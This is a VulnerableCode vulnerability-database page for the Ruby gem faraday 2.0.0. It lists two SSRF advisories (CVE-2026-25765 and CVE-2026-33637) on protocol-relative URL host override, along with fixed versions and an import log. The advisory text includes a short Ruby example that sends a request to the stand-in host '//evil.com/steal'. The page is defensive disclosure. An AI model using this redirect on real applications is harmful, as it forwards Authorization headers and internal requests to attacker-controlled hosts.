VulnerableCode Package Details - pkg:gem/faraday@2.0.0

Search for packages

Vulnerability	Summary	Fixed by
VCID-8d5e-zyuy-53g3 Aliases: CVE-2026-33637 GHSA-5rv5-xj5j-3484	Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2 - protocol-relative URI objects still bypass host scoping ## Summary `Faraday::Connection#build_exclusive_url` still allows protocol-relative host override when the request target is provided as a `URI` object instead of a `String`. This bypasses the February 2026 fix for `GHSA-33mh-2634-fwr2` and can redirect a request built from a fixed-base `Faraday::Connection` to an attacker-controlled host while preserving connection-scoped headers such as `Authorization`. ## Supporting Materials - Existing advisory for the original string-based issue: GHSA-33mh-2634-fwr2 - Existing CVE for the original string-based issue: CVE-2026-25765 - Existing regression tests for the string-only fix: - spec/faraday/connection_spec.rb:314-345 - Existing test proving supported URI request input: - spec/faraday/request_spec.rb:26-31 ## Impact The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.	2.14.2 Affected by 0 other vulnerabilities.
VCID-ycrm-uaf6-73a7 Aliases: CVE-2026-25765 GHSA-33mh-2634-fwr2	Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are treated as network-path references that override the base URL's host/authority component. This means that if any application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely. Example: ```ruby conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal')	2.14.1 Affected by 2 other vulnerabilities. This version is affected by these other vulnerabilities: {{ fixed_by_vuln.vulnerability_id }} {{ fixed_by_vuln.vulnerability_id }}

Vulnerability

Summary

Fixed by

VCID-8d5e-zyuy-53g3
Aliases:
CVE-2026-33637
GHSA-5rv5-xj5j-3484

Faraday has a possible incomplete fix for GHSA-33mh-2634-fwr2 - protocol-relative URI objects still bypass host scoping ## Summary `Faraday::Connection#build_exclusive_url` still allows protocol-relative host override when the request target is provided as a `URI` object instead of a `String`. This bypasses the February 2026 fix for `GHSA-33mh-2634-fwr2` and can redirect a request built from a fixed-base `Faraday::Connection` to an attacker-controlled host while preserving connection-scoped headers such as `Authorization`. ## Supporting Materials - Existing advisory for the original string-based issue: GHSA-33mh-2634-fwr2 - Existing CVE for the original string-based issue: CVE-2026-25765 - Existing regression tests for the string-only fix: - spec/faraday/connection_spec.rb:314-345 - Existing test proving supported URI request input: - spec/faraday/request_spec.rb:26-31 ## Impact The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

2.14.2
Affected by 0 other vulnerabilities.

VCID-ycrm-uaf6-73a7
Aliases:
CVE-2026-25765
GHSA-33mh-2634-fwr2

Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are treated as network-path references that override the base URL's host/authority component. This means that if any application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely. **Example:** ```ruby conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal')

2.14.1
Affected by 2 other vulnerabilities.

Vulnerability	Summary	Aliases
This package is not known to fix vulnerabilities.

Vulnerability

Summary

Aliases

This package is not known to fix vulnerabilities.

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-06-05T22:04:40.607387+00:00	GHSA Importer	Affected by	VCID-8d5e-zyuy-53g3	https://github.com/advisories/GHSA-5rv5-xj5j-3484	38.6.0
2026-06-05T21:58:34.883350+00:00	GHSA Importer	Affected by	VCID-ycrm-uaf6-73a7	https://github.com/advisories/GHSA-33mh-2634-fwr2	38.6.0
2026-06-04T18:16:00.869662+00:00	Ruby Importer	Affected by	VCID-ycrm-uaf6-73a7	https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-25765.yml	38.6.0
2026-06-04T16:14:41.716932+00:00	Ruby Importer	Affected by	VCID-8d5e-zyuy-53g3	https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faraday/CVE-2026-33637.yml	38.6.0
2026-06-02T04:50:01.809075+00:00	GitLab Importer	Affected by	VCID-ycrm-uaf6-73a7	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/gem/faraday/CVE-2026-25765.yml	38.6.0